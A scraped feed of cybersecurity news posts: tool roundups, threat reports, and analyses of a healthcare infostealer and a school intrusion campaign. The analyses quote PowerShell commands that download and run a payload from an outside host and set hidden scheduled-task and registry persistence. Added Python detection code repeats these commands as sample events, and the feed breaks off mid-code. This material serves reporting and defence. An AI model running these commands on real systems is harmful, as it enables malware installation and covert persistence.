Imperva’s map is especially useful for organizations concerned with DDoS and botnet activity.

Specifications

  • Real-time global attack visualization
  • DDoS, hacking, and botnet coverage
  • Data sourced from Imperva’s security services
  • Simple, intuitive interface

Reason to Buy

  • Real-time, actionable threat intelligence
  • Focus on DDoS and bot attacks
  • Trusted by enterprises worldwide
  • Free and open access

Features

  • Global attack mapping
  • Multiple threat categories
  • Instant updates
  • Easy-to-understand visuals

✅ Best For: DDoS and botnet threat monitoring

🔗 Try Imperva Live Threat Map here → Imperva Official Website

Conclusion

Cyber attack maps are now essential tools in the fight against digital threats.

In 2025, with cyber risks evolving at breakneck speed, these platforms empower organizations and individuals to visualize, understand, and respond to global and local threats in real time.

Whether you need granular analytics, historical playback, or simply a live snapshot of the world’s digital battles, there’s a cyber attack map tailored to your needs.

By leveraging the top 10 cyber attack maps reviewed here, you gain a strategic edge in threat detection, risk assessment, and incident response.

Stay informed, stay vigilant, and let these powerful visualization tools guide your cybersecurity journey in the ever-changing digital landscape.

The post Top 10 Cyber Attack Maps to See Digital Threats In 2025 appeared first on Cyber Security News.

10 Best Free Malware Analysis Tools To Break Down The Malware Samples – 2025
https://cybersecuritynews.com/malware-analysis-tools/
Wed, 02 Jul 2025 08:31:31 +0000
Malware analysis is a critical skill for cybersecurity professionals, threat hunters, and incident responders.

With the growing sophistication of cyber threats, having access to reliable, free malware analysis tools is essential for dissecting, understanding, and mitigating malicious software.

This article reviews the 10 best free malware analysis tools in 2025, covering their specifications, features, reasons to use, and who they’re best for.

Whether you’re a beginner or a seasoned analyst, these tools will help you break down malware samples and enhance your cyber defense strategies.

Comparison Table: 10 Best Free Malware Analysis Tools (2025)

Tool Name | Free | Static Analysis | Dynamic Analysis | OS Support | API Support | Evasion Resistant
--- | --- | --- | --- | --- | --- | ---
Cuckoo Sandbox | Yes | Yes | Yes | Windows, Linux | Yes | Yes
REMnux | Yes | Yes | Yes | Linux | No | No
VirusTotal | Yes | Yes | Limited | Web | Yes | No
Hybrid Analysis | Yes | Yes | Yes | Web | Yes | Yes
ANY.RUN | Yes | Yes | Yes | Web | Yes | Yes
PEStudio | Yes | Yes | No | Windows | No | No
Process Monitor (ProcMon) | Yes | No | Yes | Windows | No | No
Wireshark | Yes | No | Yes | Windows, Linux, Mac | No | No
Ghidra | Yes | Yes | No | Windows, Linux, Mac | No | No
x64dbg | Yes | Yes | No | Windows | No | No

1. Cuckoo Sandbox

Cuckoo Sandbox is an open-source automated malware analysis system that allows users to safely execute and analyze suspicious files, URLs, and documents in a controlled, isolated environment.

It supports a wide range of file types, including executables, documents, scripts, and archives, and provides detailed behavioral reports by monitoring system changes, API calls, network activity, and more.

Specifications:

  • OS: Windows, Linux
  • Analysis: Static & Dynamic
  • API: Yes
  • Deployment: On-premise

Features:

  • Modular and extensible architecture
  • Analyzes executables, documents, scripts, and more
  • Tracks API calls, network traffic (including SSL/TLS), and file system changes
  • Integrates with Volatility for memory analysis
  • Generates comprehensive, high-level reports

Reason to Buy:

  • Completely free and open-source
  • Highly customizable for advanced workflows
  • No reliance on third-party cloud services; full control over your data

✅ Best For: Automated sandboxing and custom malware analysis workflows

🔗 Try Cuckoo Sandbox here → Cuckoo Sandbox Official Website

2. REMnux

REMnux is a Linux distribution specifically designed for malware analysis and reverse engineering.

It provides a curated collection of free, community-developed tools that allow analysts to perform static and dynamic analysis, memory forensics, and network investigation without the hassle of manual installation and configuration.

Specifications:

  • OS: Linux (x86/amd64, OVA, Docker)
  • Analysis: Static & Dynamic
  • API: No
  • Deployment: Local, Cloud

Features:

  • Pre-configured with tools for unpacking, deobfuscation, and network forensics
  • Beginner-friendly with extensive documentation
  • Easily updatable via SaltStack
  • Can be deployed in the cloud or on-premise

Reason to Buy:

  • Saves time with pre-installed, curated tools
  • Free and open-source
  • Suitable for both beginners and experts

✅ Best For: Reverse engineering and comprehensive malware analysis

🔗 Try REMnux here → REMnux Official Website

3. VirusTotal

VirusTotal is a free online service that analyzes files, URLs, IP addresses, and domains for malicious content by aggregating results from dozens of antivirus engines and threat intelligence feeds.

It enables users to quickly check whether a file or link is potentially dangerous, making it a widely used tool for malware analysis, incident response, and threat intelligence across the cybersecurity community.

Specifications:

  • OS: Web-based
  • Analysis: Static (some dynamic)
  • API: Yes
  • Deployment: Cloud

Features:

  • Scans files, URLs, IPs, and domains
  • Aggregates results from multiple AV engines
  • Provides hash, network, and behavior analysis
  • Offers public and private submissions
  • Machine learning-based detection

Reason to Buy:

  • No installation required
  • Extremely fast and user-friendly
  • API for automation and integration

✅ Best For: Quick online malware detection and threat intelligence

🔗 Try VirusTotal here → VirusTotal Official Website

4. Hybrid Analysis

Hybrid Analysis is a free malware analysis platform that combines static and dynamic analysis techniques to provide comprehensive insights into suspicious files and URLs.

It uses sandboxing technology and machine learning to observe file behavior, network activity, and system changes in a controlled environment, generating detailed reports with indicators of compromise and threat intelligence data.

Specifications:

  • OS: Web-based
  • Analysis: Static & Dynamic
  • API: Yes
  • Deployment: Cloud

Features:

  • AI-powered behavioral scoring
  • Detailed forensic reports
  • Supports a wide range of file types
  • Integration with CrowdStrike Falcon
  • Minimal setup required

Reason to Buy:

  • Fast, cloud-based analysis
  • Public and private modes for confidentiality
  • Easy integration with security platforms

✅ Best For: Cloud-based sandbox analysis and enterprise integration

🔗 Try Hybrid Analysis here → Hybrid Analysis Official Website

5. ANY.RUN

ANY.RUN is an interactive online malware analysis sandbox that allows users to analyze suspicious files and URLs in real time within a safe, virtual machine environment.

It provides dynamic analysis capabilities, enabling security professionals to interact with malware samples, observe their behavior, extract Indicators of Compromise (IOCs), and generate detailed reports.

Specifications:

  • OS: Web-based
  • Analysis: Static & Dynamic
  • API: Yes
  • Deployment: Cloud

Features:

  • Real-time, interactive analysis
  • Monitors processes, network traffic, and system changes
  • Collaboration tools for team analysis
  • Supports Windows malware

Reason to Buy:

  • Live interaction with malware for deeper insights
  • Easy to use, no installation needed
  • Facilitates collaborative investigations

✅ Best For: Interactive, real-time malware analysis

🔗 Try ANY.RUN here → ANY.RUN Official Website

6. PEStudio

PEStudio is a static analysis tool for Windows executable files (PE files) widely used by malware analysts, security researchers, and software developers.

It provides a comprehensive overview of an executable’s properties, including headers, imports, exports, sections, strings, and digital signatures, helping to detect suspicious artifacts and potential security risks.

Specifications:

  • OS: Windows
  • Analysis: Static
  • API: No
  • Deployment: Local

Features:

  • Analyzes PE files for anomalies
  • Detects obfuscation, suspicious imports, and indicators of compromise
  • No installation required (portable)

Reason to Buy:

  • Fast, efficient static analysis
  • Great for triaging large numbers of samples
  • Freeware

✅ Best For: Static analysis of Windows executables

🔗 Try PEStudio here → PEStudio Official Website

7. Process Monitor (ProcMon)

Process Monitor is an advanced Windows monitoring tool that provides real-time visibility into file system, Registry, and process/thread activities.

It combines features from older utilities like Filemon and Regmon, offering powerful filtering, detailed event properties, and the ability to capture thread stacks to help identify root causes of system operations.

Specifications:

  • OS: Windows
  • Analysis: Dynamic
  • API: No
  • Deployment: Local

Features:

  • Monitors and logs system calls
  • Filters and highlights suspicious activity
  • Exports logs for further analysis

Reason to Buy:

  • Deep visibility into malware behavior
  • Free and widely trusted
  • No installation required

✅ Best For: Monitoring system activity during malware execution

🔗 Try Process Monitor here → ProcMon Official Website

8. Wireshark

Wireshark is a free and open-source network packet analyzer widely used for capturing and inspecting the details of network traffic in real time.

It allows users to troubleshoot network issues, analyze protocols, and investigate security incidents by providing a detailed, human-readable view of data packets traversing a network.

Specifications:

  • OS: Windows, Linux, Mac
  • Analysis: Dynamic (Network)
  • API: No
  • Deployment: Local

Features:

  • Captures and analyzes live network traffic
  • Supports hundreds of protocols
  • Filters and decodes suspicious communications
  • Exports PCAP files for sharing

Reason to Buy:

  • Essential for analyzing C2 and exfiltration traffic
  • Free and open-source
  • Cross-platform support

✅ Best For: Network traffic analysis and threat hunting

🔗 Try Wireshark here → Wireshark Official Website

9. Ghidra

Ghidra is a free and open-source software reverse engineering (SRE) tool developed by the U.S. National Security Agency (NSA).

It enables analysts to disassemble, decompile, and analyze compiled code across various platforms, making it a preferred choice for malware analysis and vulnerability research.

Specifications:

  • OS: Windows, Linux, Mac
  • Analysis: Static (Reverse Engineering)
  • API: Yes (Scripting)
  • Deployment: Local

Features:

  • Disassembles and decompiles binaries
  • Supports scripting for automation
  • Handles complex malware samples

Reason to Buy:

  • Free alternative to expensive commercial tools
  • Highly extensible and scriptable
  • Supports a wide range of architectures

✅ Best For: Advanced reverse engineering of malware binaries

🔗 Try Ghidra here → Ghidra Official Website

10. x64dbg

x64dbg is a free and open-source debugger for Windows that supports both 64-bit (x64) and 32-bit (x86) binaries.

It is widely used by reverse engineers, malware analysts, and security researchers to step through code, analyze assembly instructions, and understand the behavior of compiled applications without access to their source code.

Specifications:

  • OS: Windows
  • Analysis: Static (Debugging)
  • API: No
  • Deployment: Local

Features:

  • User-friendly GUI for debugging
  • Supports both x86 and x64 binaries
  • Plugin support for extended functionality

Reason to Buy:

  • Free, modern alternative to OllyDbg
  • Powerful for unpacking and analyzing packed malware
  • Community-driven development

✅ Best For: Debugging and unpacking Windows malware

🔗 Try x64dbg here → x64dbg Official Website

Conclusion

These top 10 free malware analysis tools provide a comprehensive toolkit for anyone tasked with breaking down malware samples in 2025.

From automated sandboxes and static analyzers to advanced reverse engineering suites, each tool brings unique strengths to the fight against cyber threats.

Integrate them into your workflow to stay ahead of evolving malware and protect your organization’s digital assets.

The post 10 Best Free Malware Analysis Tools To Break Down The Malware Samples – 2025 appeared first on Cyber Security News.

INTERPOL Warns of Sharp Rise in Cyber Attacks Targeting Western and Eastern Africa
https://cybersecuritynews.com/interpol-warns-of-sharp-rise-in-cyber-attacks/
Wed, 25 Jun 2025 14:41:23 +0000
The cybersecurity landscape across Africa has reached a critical juncture, with cybercrime now accounting for more than 30 percent of all reported crimes in Western and Eastern Africa, according to INTERPOL’s newly released 2025 Africa Cyberthreat Assessment Report.

This alarming statistic represents a dramatic shift in the continent’s threat landscape, where two-thirds of African member countries now report that cyber-related offenses constitute a medium-to-high share of all criminal activities.

The emergence of sophisticated cyber threats has transformed the digital security paradigm across the continent, with online scams, ransomware attacks, business email compromise schemes, and digital sextortion campaigns leading the charge.

These attacks have evolved from opportunistic strikes to highly organized criminal enterprises that exploit Africa’s rapidly expanding digital infrastructure and increasing internet penetration rates.

The threat actors behind these campaigns have demonstrated remarkable adaptability, leveraging artificial intelligence and machine learning technologies to enhance their attack vectors and evade traditional detection mechanisms.

Perhaps most concerning is the exponential growth rate of these cyber threats, with suspected scam notifications rising by up to 3,000 percent in some African countries over the past year.

INTERPOL analysts identified this surge as part of a broader pattern of cybercriminal organizations targeting the continent’s emerging digital economies, taking advantage of gaps in cybersecurity infrastructure and law enforcement capabilities.

The scope and sophistication of these attacks have prompted urgent calls for enhanced international cooperation and coordinated response strategies.

Neal Jetton, INTERPOL Cybercrime Director, emphasized the urgency of the situation, stating that the assessment “paints a clear picture of a threat landscape in flux, with emerging dangers like AI-driven fraud that demand urgent attention”.

Cyber crime risk levels (Source – INTERPOL)

The report reveals that 90 percent of African countries acknowledge needing significant improvement in their law enforcement or prosecution capacity to address these evolving threats.

This capacity gap has created an environment where cybercriminals can operate with relative impunity, establishing Africa as both a target and a launching pad for international cybercrime operations.

The financial and social impact of these cyber attacks extends far beyond immediate monetary losses, affecting critical infrastructure, government operations, and citizen trust in digital services.

Ambassador Jalel Chelba, Acting Executive Director of AFRIPOL, noted that “cybersecurity has become a fundamental pillar of stability, peace, and sustainable development in Africa,” directly impacting “the digital sovereignty of states, the resilience of institutions, citizen trust and the proper functioning of economies”.

Ransomware Campaign Analysis: Infrastructure Targeting and Persistence Mechanisms

The ransomware threat landscape in Africa has demonstrated unprecedented growth, with detection rates revealing the concentrated nature of these attacks across key economic hubs.

South Africa leads with 17,849 ransomware detections in 2024, followed by Egypt with 12,281 detections, Nigeria with 3,459, and Kenya with 3,030 cases.

These statistics illuminate a clear pattern where cybercriminals are strategically targeting nations with advanced digital infrastructure and significant economic activity.

The attack methodology employed by these ransomware groups reveals sophisticated understanding of African infrastructure vulnerabilities.

Critical infrastructure breaches, such as the attack on Kenya’s Urban Roads Authority (KURA), demonstrate how threat actors are moving beyond traditional targets to disrupt essential services.

Similarly, the compromise of Nigeria’s National Bureau of Statistics (NBS) database highlights the strategic value these attackers place on government data repositories.

These incidents suggest that ransomware operators are conducting extensive reconnaissance phases, identifying high-value targets within government and infrastructure sectors before deploying their payloads.

The persistence mechanisms observed in these campaigns indicate advanced operational security practices.

While specific code analysis remains limited due to the evolving nature of these threats, security researchers have noted the increasing use of living-off-the-land techniques, where attackers leverage legitimate system tools to maintain persistence and avoid detection.

The integration of AI-driven fraud capabilities into these ransomware campaigns represents a concerning evolution, as traditional signature-based detection systems struggle to identify dynamically generated attack patterns.

The post INTERPOL Warns of Sharp Rise in Cyber Attacks Targeting Western and Eastern Africa appeared first on Cyber Security News.

Google Warns of Cybercriminals Increasingly Attacking US Users to Steal Login Credentials
https://cybersecuritynews.com/google-warns-of-cybercriminals-increasingly-attacking-us-users/
Mon, 09 Jun 2025 21:27:44 +0000
Google’s latest comprehensive survey reveals a concerning surge in cybercriminal activities targeting American users, with over 60% of U.S. consumers reporting a noticeable increase in scam attempts over the past year.

The technology giant’s collaboration with Morning Consult has unveiled alarming statistics showing that one-third of Americans have personally experienced data breaches, while malicious actors have intensified their efforts to compromise user credentials through sophisticated social engineering techniques.

The threat landscape has evolved significantly, with cybercriminals employing multiple attack vectors to harvest login credentials from unsuspecting users.

Text message-based scams have emerged as the primary attack method, though 61% of respondents reported being targeted through email campaigns designed to steal personal information.

Risky password habits (Source – Google)

These attacks typically involve urgent requests for sensitive data, suspicious links, and carefully crafted phishing attempts that mimic legitimate services to deceive users into surrendering their authentication credentials.

Google analysts and researchers have identified a critical shift in how different demographic groups respond to these evolving threats.

The company’s security team noted that while over 80% of users report feeling confident in their ability to spot scams by recognizing requests for personal information and suspicious links, the actual implementation of robust security measures varies dramatically across age groups.

This disparity in security adoption has created vulnerabilities that cybercriminals are actively exploiting to gain unauthorized access to user accounts.

The FBI’s latest data supports Google’s findings, revealing that online scams generated a record $16.6 billion in losses last year, representing a 33% increase from the previous year.

This sharp growth in cybercriminal revenue demonstrates the effectiveness of their credential theft operations and highlights the urgent need for enhanced security measures across all digital platforms.

Authentication Method Vulnerabilities and Generational Security Gaps

The survey data reveals a concerning security paradox where traditional authentication methods continue to dominate despite their inherent vulnerabilities to credential theft attacks.

Gen-Z leading to safer sign-ins (Source – Google)

Over 60% of Generation X and Baby Boomers still rely primarily on password-based authentication systems, creating significant attack surfaces for cybercriminals who have developed sophisticated techniques to compromise these legacy security mechanisms.

Google’s research indicates that while these older authentication methods may feel familiar to users, they are increasingly susceptible to phishing attacks and data breaches that expose login credentials to malicious actors.


Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024 https://cybersecuritynews.com/healthcare-cyber-attacks/ Thu, 15 May 2025 07:29:19 +0000 https://cybersecuritynews.com/?p=106090 In 2024, the healthcare sector faced an unprecedented wave of cyber attacks, with 276 million patient records exposed globally. Among the most insidious threats was MedStealer, a malware strain that targeted electronic health records (EHRs), insurance databases, and patient portals. First observed in early 2024, MedStealer exploited vulnerabilities in legacy healthcare IT systems and third-party […]

The post Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024 appeared first on Cyber Security News.

In 2024, the healthcare sector faced an unprecedented wave of cyber attacks, with 276 million patient records exposed globally.

Among the most insidious threats was MedStealer, a malware strain that targeted electronic health records (EHRs), insurance databases, and patient portals.

First observed in early 2024, MedStealer exploited vulnerabilities in legacy healthcare IT systems and third-party vendor networks.

Attack vectors ranged from phishing campaigns impersonating medical platforms like Zocdoc to SQL injection attacks on unpatched servers.

The malware’s primary objective was to exfiltrate personally identifiable information (PII), insurance details, and medical histories, which were later sold on dark web markets for premiums exceeding $1,000 per record.

Check Point researchers identified MedStealer’s distribution network, which relied heavily on spear-phishing emails disguised as appointment confirmations or prescription notifications.

These emails contained malicious PDF attachments embedded with JavaScript droppers.

Zocdoc Phishing Email Template (Source – Check Point)

Once opened, the script initiated a PowerShell command to download the malware payload from a command-and-control (C2) server.
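The attachments described above carry their payload as a JavaScript action that fires when the PDF is opened. A mail gateway or SOC analyst can triage such files before anyone opens them by looking for the handful of PDF name tokens that make a document executable. The following is an added Python example, not code from Check Point or from the original article; the two embedded PDFs are constructed samples, and the risk weights are illustrative.

```python
import re
from typing import Dict

# PDF name tokens that, alone or combined, justify a closer look.
# Presence is a triage signal, not a verdict: legitimate forms use some of these too.
SUSPICIOUS_NAMES = {
    "/JavaScript": "JavaScript action",
    "/JS": "JavaScript code stream or string",
    "/OpenAction": "action runs as soon as the document opens",
    "/AA": "additional actions bound to page or field events",
    "/Launch": "launches an external program or file",
    "/EmbeddedFile": "attached file payload",
    "/URI": "external URL reference",
}

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes in PDF name objects so that /J#53 is seen as /JS.

    Droppers use this trick to hide keywords from naive string matching.
    (Applied to the whole byte string for simplicity; stream bytes may change too.)
    """
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_suspicious_names(data: bytes) -> Dict[str, int]:
    """Count each suspicious name token, ignoring longer names that share a prefix."""
    flat = normalize_names(data)
    counts: Dict[str, int] = {}
    for name in SUSPICIOUS_NAMES:
        # A name ends at whitespace or a delimiter, so /JS must not match /JSx.
        pattern = re.compile(re.escape(name.encode()) + rb"(?![A-Za-z0-9])")
        hits = len(pattern.findall(flat))
        if hits:
            counts[name] = hits
    return counts


def triage(data: bytes) -> Dict[str, object]:
    """Summarise why a PDF attachment deserves sandboxing before anyone opens it."""
    counts = count_suspicious_names(data)
    auto_runs_script = "/OpenAction" in counts and (
        "/JS" in counts or "/JavaScript" in counts
    )
    # Script that runs on open is the hallmark of a dropper, so weight it heavily.
    score = sum(counts.values()) + (5 if auto_runs_script else 0)
    return {
        "counts": counts,
        "reasons": [SUSPICIOUS_NAMES[n] for n in counts],
        "auto_runs_script": auto_runs_script,
        "score": score,
    }


# Constructed sample: a minimal dropper-style PDF whose catalog fires a
# JavaScript action on open and hides the /JS key as /J#53. Not a real sample.
SAMPLE_DROPPER_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /S /JavaScript /J#53 (app.launchURL('hxxp://example.invalid/u')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: a plain one-page text PDF with no actions at all.
SAMPLE_BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj
4 0 obj << /Length 44 >> stream
BT /F1 12 Tf 72 712 Td (Appointment confirmed) Tj ET
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, pdf in (("dropper", SAMPLE_DROPPER_PDF), ("benign", SAMPLE_BENIGN_PDF)):
        print(label, triage(pdf))
```

The hex-escape decoding step matters more than the keyword list: a document that spells its action key as /J#53 slips past any filter that only searches for the literal string /JS, while a parser-aware tool sees the same name either way.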

The campaign’s success stemmed from its use of geofencing (targeting users based in the U.S.) and from leveraging compromised healthcare employee credentials to bypass email filters.

The fallout was catastrophic: stolen data fueled insurance fraud, illicit prescription drug sales, and even life-threatening medical errors when EHRs were altered.

Hospitals reported delays in treatments due to system lockdowns, while patients faced identity theft lawsuits and extortion attempts.

Infection Mechanism: Blending Social Engineering with Obfuscated Code

MedStealer’s infection chain combined psychological manipulation with advanced technical evasion. A typical attack began with a phishing email titled “Your Appointment is Ready!”, which included a fake medical ID and pressed the recipient to act quickly.

The attached PDF used a URL with a Base64-encoded parameter to fetch the payload:

$payloadUrl = "hxxps://healthportal[.]care/update.php?ID=ZXhhbXBsZS1iYWQN";
Invoke-WebRequest -Uri $payloadUrl -OutFile $env:Temp\med_update.exe; Start-Process $env:Temp\med_update.exe

The malware employed process hollowing to inject itself into legitimate Windows utilities like svchost.exe, evading endpoint detection.

Check Point analysts noted that MedStealer’s authors used DNS tunneling to exfiltrate data, disguising stolen records as benign HTTPS traffic.
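Exfiltration over DNS leaves a characteristic footprint in resolver logs: one base domain receives many queries whose leftmost labels are long, never repeat, and look like encoded data rather than hostnames, often for TXT or NULL records. The following is an added Python example of that heuristic, not code from Check Point or from the article; the log format and the hp-sync.invalid queries are constructed, and the thresholds are starting points to tune against a real baseline.

```python
import math
from collections import defaultdict
from typing import Dict, Tuple

# Constructed sample, not real telemetry. Format: "timestamp client qname qtype".
# The hp-sync.invalid queries imitate chunks of exfiltrated data carried in labels.
SAMPLE_DNS_LOG = """\
2024-03-02T10:00:01 10.0.5.21 www.example.org A
2024-03-02T10:00:03 10.0.5.21 cdn.example.org A
2024-03-02T10:00:04 10.0.5.21 mail.example.org MX
2024-03-02T10:01:10 10.0.5.40 k7d2mq9xbz3vwt5ncfhl8gyp6rj4ase.hp-sync.invalid TXT
2024-03-02T10:01:11 10.0.5.40 vb7r3ksd9xz2qwta5nmch6gyl4pj8efu.hp-sync.invalid TXT
2024-03-02T10:01:12 10.0.5.40 a4hf8sjq2kdlpz6xcv9wnmt3gyb5r7eu.hp-sync.invalid TXT
2024-03-02T10:01:13 10.0.5.40 z5qj3wgdk9ymv2pc6lhtxa7sn4rfbe8.hp-sync.invalid TXT
2024-03-02T10:01:14 10.0.5.40 n9ct4xlz2bq7vhpa8jmw3fkg5ryd6seu.hp-sync.invalid TXT
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores high, dictionary words score low."""
    if not s:
        return 0.0
    n = len(s)
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str) -> Tuple[str, str]:
    """Split a query name into (client-controlled prefix, registrable base domain).

    Simplification: the last two labels are treated as the base domain. A
    production tool should use the Public Suffix List (co.uk and friends).
    """
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def profile_domains(log_text: str) -> Dict[str, dict]:
    """Aggregate, per base domain, the features that tunnelling inflates."""
    stats: Dict[str, dict] = defaultdict(
        lambda: {"queries": 0, "prefixes": set(), "prefix_len": 0,
                 "entropy": 0.0, "txt_null": 0}
    )
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the sweep
        _ts, _client, qname, qtype = parts
        prefix, base = split_qname(qname)
        s = stats[base]
        s["queries"] += 1
        s["prefixes"].add(prefix)
        s["prefix_len"] += len(prefix)
        s["entropy"] += shannon_entropy(prefix.replace(".", ""))
        if qtype in ("TXT", "NULL"):  # record types that carry bulk data
            s["txt_null"] += 1
    return stats


def flag_tunnels(log_text: str, min_unique: int = 5, min_len: int = 20,
                 min_entropy: float = 3.5) -> Dict[str, dict]:
    """Return base domains whose query pattern looks like a covert channel.

    All three conditions must hold: many distinct subdomains (each chunk is
    new), long prefixes (payload packed into labels) and high entropy
    (encoded rather than human-readable). Tune thresholds to your baseline.
    """
    flagged: Dict[str, dict] = {}
    for base, s in profile_domains(log_text).items():
        q = s["queries"]
        mean_len = s["prefix_len"] / q
        mean_entropy = s["entropy"] / q
        if (len(s["prefixes"]) >= min_unique and mean_len >= min_len
                and mean_entropy >= min_entropy):
            flagged[base] = {
                "queries": q,
                "unique_prefixes": len(s["prefixes"]),
                "mean_prefix_len": round(mean_len, 1),
                "mean_entropy": round(mean_entropy, 2),
                "txt_null_ratio": round(s["txt_null"] / q, 2),
            }
    return flagged


if __name__ == "__main__":
    for domain, info in flag_tunnels(SAMPLE_DNS_LOG).items():
        print(domain, info)
```

Content-delivery and telemetry domains also generate many unique subdomains, so the unique-prefix count alone produces noise; requiring length and entropy as well, and allow-listing known SaaS domains, keeps the rule usable on a busy resolver.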

For persistence, the malware created a scheduled task named “HealthMonitor”:

schtasks /create /tn "HealthMonitor" /tr "C:\Windows\System32\med_update.exe" /sc hourly /mo 12

Notably, MedStealer exploited vulnerabilities in DICOM protocols (used for medical imaging), allowing lateral movement within hospital networks.

Attackers leveraged misconfigured PACS (Picture Archiving and Communication Systems) to deploy ransomware alongside data theft tools.

The surge in healthcare breaches underscores the need for zero-trust architectures and AI-driven anomaly detection.

Check Point’s Harmony Email & Collaboration suite blocked over 7,000 MedStealer-linked phishing attempts in 2024, highlighting the critical role of adaptive email security.

As cyber criminals refine their tactics, healthcare organizations must prioritize patch management, employee training, and multi-layered threat prevention to safeguard sensitive patient data.

Hackers Launching Cyber Attacks Targeting Multiple Schools & Universities in New Mexico https://cybersecuritynews.com/hackers-launching-cyber-attacks-targeting-multiple-schools/ Tue, 06 May 2025 16:52:30 +0000 https://cybersecuritynews.com/?p=104471 Educational institutions across New Mexico are facing a growing cyber threat landscape, mirroring a troubling pattern seen nationwide. Recent network intrusions targeting multiple schools and universities in the state have raised significant concerns about digital security in educational environments. These sophisticated attacks have disrupted administrative systems while carefully avoiding interference with student learning platforms, suggesting […]

The post Hackers Launching Cyber Attacks Targeting Multiple Schools & Universities in New Mexico appeared first on Cyber Security News.

Educational institutions across New Mexico are facing a growing cyber threat landscape, mirroring a troubling pattern seen nationwide.

Recent network intrusions targeting multiple schools and universities in the state have raised significant concerns about digital security in educational environments.

These sophisticated attacks have disrupted administrative systems while carefully avoiding interference with student learning platforms, suggesting a strategic approach by the threat actors.

The attacks typically begin with unauthorized network activity during evening hours or weekends when monitoring may be reduced.

Security experts note that the intrusions follow a pattern of lateral movement through administrative networks, with attackers establishing persistence while carefully avoiding detection.

This methodical approach allows for extended access to potentially sensitive systems without triggering immediate alerts that would come from disrupting student-facing services.

Coweta School System analysts identified similar patterns in their own security incident, noting that the attack methodology shows striking similarities to those targeting New Mexico institutions.

Their investigation revealed that threat actors specifically targeted administrative networks while deliberately leaving student-accessible systems – including Chromebooks, WiFi access, and communication tools – operational to delay detection.

“The network intrusion is serious, and is being investigated by the school system and a number of security partners,” according to official statements.

The incidents have been reported to appropriate authorities, including state emergency management agencies and Homeland Security.

Schools have implemented established security protocols, taking affected systems offline while maintaining educational operations.

Attack Vector Analysis

The primary infection vector appears to be compromised administrator credentials, obtained through social engineering campaigns targeting staff members.

Once gaining initial access, attackers deploy a modified remote access trojan with persistence capabilities.

A typical attack sequence involves a PowerShell command like:

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "New-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name 'SystemServiceHost' -Value 'powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -File %TEMP%\service.ps1' -Force"

This command establishes persistence by creating a registry run key that executes a hidden PowerShell script on startup.
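The Run-key one-liner here, and the download cradle and “HealthMonitor” scheduled task quoted in the MedStealer piece above, are all visible in process-creation telemetry (Sysmon Event ID 1 or an EDR equivalent) as a command line plus its parent process. The following is an added Python example of rule-based hunting over such events, not code from either article or from any vendor; the five events are constructed to mirror the quoted commands, with a placeholder hostname in place of real infrastructure.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed process-creation events (the fields a Sysmon Event ID 1 record
# carries). Command lines mirror the snippets quoted in the articles; the
# download hostname is a placeholder, not real infrastructure.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "ev1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Adobe\Acrobat Reader\AcroRd32.exe",
     "cmd": r"powershell.exe -Command Invoke-WebRequest -Uri hxxps://example.invalid/update.php -OutFile $env:Temp\med_update.exe; Start-Process $env:Temp\med_update.exe"},
    {"id": "ev2", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'schtasks /create /tn "HealthMonitor" /tr "C:\Windows\System32\med_update.exe" /sc hourly /mo 12'},
    {"id": "ev3", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'''powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "New-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name 'SystemServiceHost' -Value 'powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -File %TEMP%\service.ps1' -Force"'''},
    # Two benign events so the rules have something to leave alone.
    {"id": "ev4", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
    {"id": "ev5", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"schtasks /query /fo LIST"},
]

IC = re.IGNORECASE
# -W Hidden / -WindowStyle hidden: the console is deliberately kept off-screen.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", IC)
# -Exec Bypass / -ExecutionPolicy Bypass: script signing policy is switched off.
EXEC_BYPASS = re.compile(r"-ex\w*\s+bypass", IC)
# Common ways to pull a file or script body from the network.
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer", IC)
EXECUTE_AFTER = re.compile(r"start-process|invoke-item|\bsaps\b", IC)
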